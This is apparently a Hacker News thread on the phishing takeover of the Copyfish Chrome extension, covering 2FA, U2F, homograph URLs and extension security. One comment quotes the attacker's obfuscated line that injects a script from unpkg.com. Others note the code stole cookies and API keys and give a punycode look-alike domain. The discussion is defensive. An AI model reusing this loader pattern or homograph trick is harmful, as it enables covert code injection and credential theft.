Mozilla reviews every update. It means it takes much longer to get releases out, sometimes months, but it avoids situations like this.


The Great Suspender Chrome extension was also phished

https://github.com/deanoemcke/thegreatsuspender/issues/512


Typewriter sounds, a Twitch window which is always on top, one of the YouTube UI upgrade extensions -- but in those cases the authors simply sold the extensions to a malicious company.


but apparently non-maliciously


What do you mean?

I thought the attacker stole the account maliciously, but hadn't quite gotten around to inserting the malware by the time it was taken back.


The live http headers hacking was quite embarrassing for myself personally.

I had strong suspicions that a certain webhost a new client of mine utilized was both prone to attack, and not very forthcoming when past attacks had occurred.

So when I loaded their own website one day and found it full of ads for Russian pornography... I confirmed my own bias that the webhost had been hacked... deleted the account, and moved everything over to AWS.

Changed all the passwords, freaked out a bit, etc...

Then I realized that it was just the extension I was running that injected those ads... d'oh!


The somewhat obfuscated JS downloaded from unpkg.com has what appears to be a Google Analytics ID in it: UA-103045553-1. I'm not sure if that can help trace the origin.


It's a bad weekend for Chrome Extensions, it seems.

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20pre...


Good reminder that you should never be in the mindset of "expecting" a phish from any source - trust is how they get you. Also, if a message was really urgent, you wouldn't have to click-through to see it.


I think I'm misreading your comment, but the best defense against phishing is to always be expecting a phishing attack from every source. Every time you're about to paste your password, glance at the url bar.


I think you're both right - the way I read their comment was more like "if you expect a phishing attack only from certain sources, this implies you're not on the defensive against attacks which aren't from those sources".


Password managers with browser extensions are a good fix for this too. If you're used to entering your password only through the extension, not being able to do that on a login screen would be a big warning sign. Admittedly, these extensions have had some vulnerabilities in the past, but phishing is simply a bigger problem for the vast majority of users.

Obviously, for sites that support U2F (like Google), getting a YubiKey or any other U2F-compatible key would be the best protection against this.


Semi-relevant link from Bruce Schneier on the subject, noting that he did not design Password Safe with a browser extension in mind: https://www.schneier.com/blog/archives/2014/09/security_of_p.... The Android version implements a keyboard replacement rather than browser integration; though not as easy to use, it is still mostly usable.


I read it as, “you should never be in the mindset of ‘expecting’ a phish from any [specific] source.”

I think OP agrees with you.


> Every time you're about to paste your password, glance at the url bar.

Actually - I disagree with this. You can no longer "glance" at the url bar to determine if you are on the right domain due to Unicode chars if you clicked a link.

The only safe way is to type the url yourself into the browser.

If it is a long link - then at least typing the base domain, and pasting the "rest" is probably safe?


I use 1Password to autofill my passwords, which it won't do if the domain doesn't match, which should also work.


This actually isn't true. A website like https://www.xn--80ak6aa92e.com/ won't show up as apple.com. Browsers don't allow Unicode rendering in the URL bar.

Maybe IE is affected though. I haven't tested every browser. But it's a known security concern.


Disable IDN and you will be safe from those. If you're not going to use non-ASCII domain names, you won't miss much.


It shows up as www.apple.com on Firefox 54.0.1 (latest, up-to-date) on OSX.


Just tried - same (54.0.1) FF version on Android DOES show apple.com (Chrome and Yandex do not).


about:config, set network.standard-url.punycode-host to true


Sorry to tell you, does show up as apple.com in my browser. Chrome 52.0.2743.82-1 on Arch x86_64.


That version of Chrome is over a year old.


The IDN vulnerability was fixed by Google in Chrome 58.

https://arstechnica.co.uk/information-technology/2017/04/chr... https://bugs.chromium.org/p/chromium/issues/detail?id=683314

Why have you got such an old version of Chrome?


Thank you. That gives me a strong reason to update.

To answer your question, (1) it's pretty arduous to install Chrome from the AUR, and (2) I am wary of Google removing useful functionality from Chrome.


>Also, if a message was really urgent, you wouldn't have to click-through to see it.

I don't get that logic. What's the difference between

    Your adwords account was suspended due to suspected click fraud. [bunch of made up plausible reasons]. you may appeal by going to your adwords control panel [phishing link here]
and

    Your adwords account was suspended. click here to see why [phishing link here].
In both cases you'd be pretty tempted to click the link.


Spear phishing is remarkably effective, even against tech-savvy people. One of the most alarming aspects is that we've become trained to click links in emails as soon as we see some trustworthy indication, be it something we were expecting, a spoofed sender or a copy of Google's layout, further reinforced by an accurate login page clone.

I think the best defence here is to condition ourselves out of this behaviour. If you receive a link in an email, don't click it - view the source or paste it into a text document and examine it. And if you aren't expecting an email, such as Google emailing out of the blue, go to the known-trusted site and see if there's any pending notifications.

Seems we need to stop trusting email.


I've gotten this phishing e-mail 3 times over the past month or so. The first time I almost fell for it.

Looking at the attacker's code, they are currently trying to steal cloudflare api keys in addition to stealing cookies from all sites the extension users visit :(


Of course it's a phishing attack. Why would Google send you a bit.ly link to your own Google account?


"Note that the bitly link was not directly visible in the phishing email, as it was an HTML-email. That is another lesson learned: Back to standard, text-based email as the default."


Thunderbird has phishing/scam detection built in that shows a pop-up with "this message might be a scam" if there is URL-like text in the message that points to another, different URL. So having the text "www.google.com" with a link to bit.ly would show a warning.

Sadly it is a bit overzealous and shows messages with say www.google.com that go to www.google.com/ as malicious too (i.e. trailing / so the text and URL don't exactly match though they resolve to the same thing), but the idea seems sound. I'm surprised gmail doesn't have something like this.
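A rough sketch of that heuristic (not Thunderbird's actual code): flag anchors whose visible text looks like a URL but whose href points at a different host.

  function suspiciousLinks(doc) {
    return [...doc.querySelectorAll("a[href]")].filter(a => {
      const text = a.textContent.trim();
      if (!/^(https?:\/\/|www\.)/i.test(text)) return false; // text isn't URL-like
      const textHost =
        new URL(/^https?:/i.test(text) ? text : "http://" + text).hostname;
      return textHost !== new URL(a.href).hostname;
    });
  }
  // <a href="https://bit.ly/x">www.google.com</a> would be flagged; comparing
  // hostnames rather than full URLs also avoids the trailing-slash false positive.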


I always look at the mouse over url. And check the URL in the address bar. And rely on the password manager in the browser. And sometimes login in a new tab, then go back and reload the link.


A pity some browsers now hide the mouse over URL.

I use this in safari to bring it back: https://visnup.github.io/Minimal-Status-Bar/


In Safari you can go to "View -> Show status bar" to bring it back natively without a third-party extension.


Amazing, thanks!


bit.ly addresses don't keep their URL in the address bar (Eg. http://bit.ly/19y8wyr for HN), so it's possible you might not notice it once you've clicked, depending on how realistic the malicious target URL was.


Password managers really help in that situation. They will refuse to autofill your Google password if you're redirected to a domain that looks like google.com but actually contains weird Unicode characters, for example.


They could have used the goo.gl shortener, or an open redirect on google.com.


Something to be said about auto updating software...


I'd have thought that two-factor authentication could have prevented this type of attack?


It could, and the plugin creators regret not having it active for everyone's account:

> Sigh... totally agree. I could add a longer story why just this account had no 2FA enabled, but the lesson learned is simple: From now on, we enable 2FA for every account that offers it.

So they won't make this mistake again.


Thanks - saw it now in the comments.


Only with U2F, because the hardware dongle would refuse to provide the OTP to a different domain


Yeah, we really need to distinguish between a 2FA app and a dedicated hardware key. My phone is probably the least secure thing I've ever owned, both in terms of technical security, and physical security.

This whole 2FA thing has been really jarring for me, because I always treated my phone like a public space: no password, no private data (that I know of), ready for inspection by foreign authorities. Of all the things the world could ask me to trust, why the phone?


> Of all the things the world could ask me to trust, why the phone?

Because it's the only instance of a computer that you can expect the majority of users to own and always have on them.

2FA as a thing would not get any reasonable adoption if you required people to buy hardware keys to use it. Not to mention, hardware keys do not work on every device one would like to log in from (AFAIK you can't plug in a Yubikey to an Android tablet, and it may not have NFC built in).


> AFAIK you can't plug in a Yubikey to an Android tablet, and it may not have NFC built in

Using a USB OTG adapter, it should be possible. However, even the flagship tablets from Samsung don't carry NFC, only the phones do - and even there it's hit and miss whether you have NFC.

Apple, on the other hand, doesn't have developer-accessible NFC anywhere.

This is a real shame.


Even a dedicated hardware key that generates an OTP[1] can still be phished. Only U2F cannot be phished.

[1] https://en.wikipedia.org/wiki/Security_token#/media/File:Cry...


For clarity: U2F does not use one-time passwords (OTP), but challenge-response authentication. This is why it provides better protection against phishing than hardware OTP tokens.
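A minimal sketch of what that challenge-response flow looks like in the browser (using WebAuthn, the successor API to U2F; parameter values are illustrative):

  async function signIn(serverChallenge, credentialId) {
    // The browser signs the challenge together with the page's *origin*,
    // so an assertion produced on a phishing domain verifies only for
    // that domain and is useless against the real site.
    const assertion = await navigator.credentials.get({
      publicKey: {
        challenge: serverChallenge, // random bytes issued by the real site
        allowCredentials: [{ type: "public-key", id: credentialId }],
      },
    });
    return assertion; // sent back to the server for verification
  }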


Not if the phishing site asks for the 2FA token.


The point of U2F is challenge-response, and the secret key is in the token. If a phishing site asks for 2FA it can get only one valid challenge-response pair, not the secret key.


One login is enough to authorize an OAuth app.


Require a second login to transfer Chrome apps to an alternate account, plus a 24-hour timer on transfer that sends an email to the recovery email (and everyone else relevant) when an extension is being transferred.


That still allows them to log in though.


SMS and TOTP (Google Authenticator) can both be phished.

U2F cannot be phished.


Can't it?

What if I control the user's computer and can let my own code interact with U2F? Or does the protocol somehow prevent that?


If you control the user's computer, that isn't phishing. That's keylogging/credential theft.


>> We are trying to contact Google, but so far, have been unable to reach any human being that can help.

So typical, unfortunately.


No 2FA? No additional password / 2FA challenge when a big, dangerous operation like moving an extension to another account is triggered?


We should never have to read a title "disable immediately" by a developer. In a news article. That is not how this should be distributed, even when the original developer is the one distributing the news.

Instead, Google should generate an emergency disable code that a developer can put into a simple web form from anywhere in the world, even if the developer has been locked out of every one of their accounts, which immediately centrally disables that extension.

How it should work.

Parts.

1. "revocation code generation" and explanation. Text like: "this is a secret revocation code. Anyone who learns it can immediately disable your extension. Keep it secure and separate from all of your production systems. You will be able to use it even if locked out of all other acccess."

2. A web form people can submit revocation codes to, from anywhere with Internet access.

The code should be very high-entropy and generated by Google. However, it should not have ambiguous characters like 1 and capital I.

I personally would generate it using a diceware-like wordlist. Also, I personally would ensure it had approximately 384 bits of total entropy, of which one third is a recovery checksum. This enables the developer to write many words down wrong and still be able to disable their extension. In case the recovery record/checksum portion were used, I would offer the user the result "You appeared to have made a mistake which we could correct. Is this the correct disable key?" then show the corrected version.
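A minimal sketch of just the generation step (wordlist size and word count are illustrative; the error-correcting checksum part is omitted):

  const crypto = require("crypto");

  // Pick words uniformly at random with a CSPRNG, diceware-style.
  function revocationCode(wordlist, nWords) {
    const words = [];
    for (let i = 0; i < nWords; i++) {
      words.push(wordlist[crypto.randomInt(wordlist.length)]);
    }
    return words.join("-");
  }
  // A 7776-word list gives ~12.9 bits per word, so 20 words is ~258 bits,
  // roughly the 256 entropy bits described above; checksum words would
  // then be appended on top.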

However, this last idea seems to be beyond the state of cryptography worldwide (i.e. for some reason I have written something that exceeds best practices worldwide, like I'm from the future or something), so I understand if Google's cryptographers don't implement this part.

The above seems a bit grandiose of me so here is the comment where I first wrote about this:

https://news.ycombinator.com/item?id=14571414


> We should never have to read a title "disable immediately" by a developer. In a news article.

If you want to change that, start contacting reporters from mainstream media. If this hits the New York Times or the Wall Street Journal, or at least Techdirt, Google might notice.


Google is staffed by geniuses who also read HN and I feel it is sufficient that I suggested one possible correct solution here on HN. I am sure they'll introduce some solution to this problems. (I mean some way for them to disable compromised extensions centrally.)

I am not personally an extension developer and don't run many.


The people you need to convince is Google management, so that they prioritize this over everything else on the roadmap. One easy way to do that from outside is to make it actually a priority, by making it a PR issue. Otherwise it turns into one of those perennial 'things we want to do' that never beats out the critical items on the roadmap.


can you give a source for this insight? tell me more.

It does explain so much. For example, all this work was put into a ridiculous, animated, moving, flashing new Gmail sign-in page that was pre-announced for weeks ("our sign-in page is changing!"), and after all that work it does not include even seven and a half minutes' worth of improvement by a developer. For example, I had to laugh and laugh after I realized it wasn't accepting my password because my caps lock was on.

I would expect a popup warning if you have your caps lock turned on while typing. Because, you know, that is one of literally like 3 things you can do to improve a sign-in page that is that dynamic and moving and flashing. There's just not much to improve.

All that flash and it doesn't do anything at all. Your comment gives a lot of insight as to why, so I would like to understand this cultural shift.

How does management work at Google now?


How would you handle exposed disable codes (say if a person who had access to it leaves the company)? There are presumably situations where revocation of the code would be needed, but that seems difficult to implement without also opening a window for the attacker to use:

* instant revocation -> attacker will just revoke the code

* delayed revocation where the code remains usable for some period -> accidental exposure is irrecoverable

Maybe it's viable as an option (extension owner takes on the risk of properly managing the secret, knowing it can't be revoked easily).


We are competing with publishing "if you're my user, disable my extension."

Revocation codes should revoke. A malicious employee or compromised gmail account should be able to disable an extension, yes. The developer should then have to work to reinstate it.

Extensions are not part of the core Chrome experience.

You are asking: "As a user, are you okay with Chrome extensions being disabled by Google if its developer had their revoke key compromised?"

Nobody would say "no".

Compare: "as a user, are you okay with Microsoft Windows locking and not booting, in case Microsoft's internal revoke key experienced a security issue?" (until Microsoft issues an update which unlocks it again.)

Most people would not want that, because people need to finish working on their things in this scenario. (Of course some ultra secure installations might want that, but most wouldn't.)

The difference is that these are small, third-party developers, working on extensions, not the core functionality.

I hope this answers your question regarding how I personally would handle exposed codes.

However, I am not an extension developer or heavy extension user! I am not saying this is the only solution.


That is a good start but isn't sufficient. Many browsers exist on networks that are airgapped or are off of the Internet for extended periods of time. Plus, there are regulations or policies in many places that forbid this type of action.


Are we talking about the same thing? Chrome? Chrome literally auto-updates.


My point is that Chrome cannot always auto-update for all installations. From that standpoint I made the comment that an Internet based revocation code may not be sufficient, and disclosures/notifications will still need to be monitored by administrators.


Orgs running such ridiculous setups can monitor revokes coming over the wire from Google and selectively apply them themselves, if they just care about their busy-work jobs sitting reading security bulletins. I don't really care about the security of their made-up non-jobs and Google shouldn't either. They can do what they like.


FYI, This "Better History" extension in Chrome has a history of selling browser history since it was sold by its developer: https://chrome.google.com/webstore/detail/better-history/obc...

They frequently remove it from the store when people notice and restore it a month or so later.

The comments over the past year or so detail the symptoms of spyware. The "Report Abuse" button in Chrome Store feels useless.


You can use the Chrome Apps & Extensions Developer Tools[1] to monitor the activity of your apps and extensions.

[1]: https://chrome.google.com/webstore/detail/chrome-apps-extens...


Can someone explain to me why the attacker wrote the script source tag as

  "var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';"
Instead of just:

  var config_fragment = '<script src="https://unpkg.com/' + hash + '/' + hour + '.js"></script>';


To make it more difficult to analyze the script. A simple string search will fail to catch the offending code.


It’s usually done to prevent the parser from interpreting the closing script tag early: https://stackoverflow.com/questions/236073/why-split-the-scr...


If this is truly the reason, the coder went overboard in splitting it up, IMO.


Please use Google's "Password Alert" Chrome extension to protect your Google account. It will notify you if you accidentally enter your Google password on another website.


> Back to standard, text-based email as the default.

Yeah, but what will you do when you receive an HTML-only mail, or a mail with a text/plain alternative saying "lol, get a better MUA", or a mail with a text/plain alternative so mangled it can't be read without making your brain hurt?

All these are common occurrences in automatically sent e-mails these days.


View the HTML mail, but with fancy rendering, images, all remote content, etc. disabled.

Thunderbird does this by default.


> View the HTML mail

And that's exactly what phishers want you to do.


Debian patched the Chromium browser to refuse to install or update add-ons from the Chrome store. At first I found this annoying, but I am coming around to their way of thinking--that ultimately I can only trust software in the Debian archive.


While I understand how some people can take this as a cautionary tale in favor of 2FA, as someone who doesn't like it and won't use it, I guess my mindset is very simple. There's the old saw that over time, computing has evolved from smart people in front of dumb terminals into dumb people in front of "smart" terminals. This attack is proof of it; and while 2FA might have had an impact, the major issue here is that we had a dumb person - this "unlucky" team member - who either didn't have the training or the common sense to understand that if you have a public presence on the Internet, you are a target. If you have auto-updating software installed on more than 1 machine, you are going to be someone's target because they want access to that person's computer.

The lesson here is: never trust anyone or anything.


> The lesson here is: never trust anyone or anything.

Which is why you should use 2FA and why you shouldn't trust someone who says they don't use it.


I don't trust any of the 2FA providers. And I have neither the time nor the interest to try and learn to code it in binary.


TOTP is a specification and there are many free software implementations. U2F is also a specification (but generally its implementations aren't free software).


Again - I don't trust the people who created the specifications; and I don't trust either the free implementors or the non-free ones, though my inclination would be to go with non-free if I were forced. As it is, I simply don't use services that rely on them.


> The lesson here is: never trust anyone or anything.

I find it interesting that most people who replied to your post were upset with you. The first maxim of programming is, "all input is evil." Good Internet Hygiene means not to click links in emails.


tl;dr: A member of the development team thought it unexceptional and credible that Google should be using a clickable bit.ly url in an unsolicited email asking for login and update.

The world is an uphill kind of place.


"This looked all legit to the team member" sure the team member checked the URL of the password screen? Yes, and Google using Freshdesk.


(In the article "phishing" is consistently misspelled as "pishing".)


Perhaps the author of the page really isn't the author of Copyfish, and they phished us all with a page about getting phished.


TLDR: Use FIDO hardware 2FA. The tokens are $15. No excuses.


Always use 2FA.



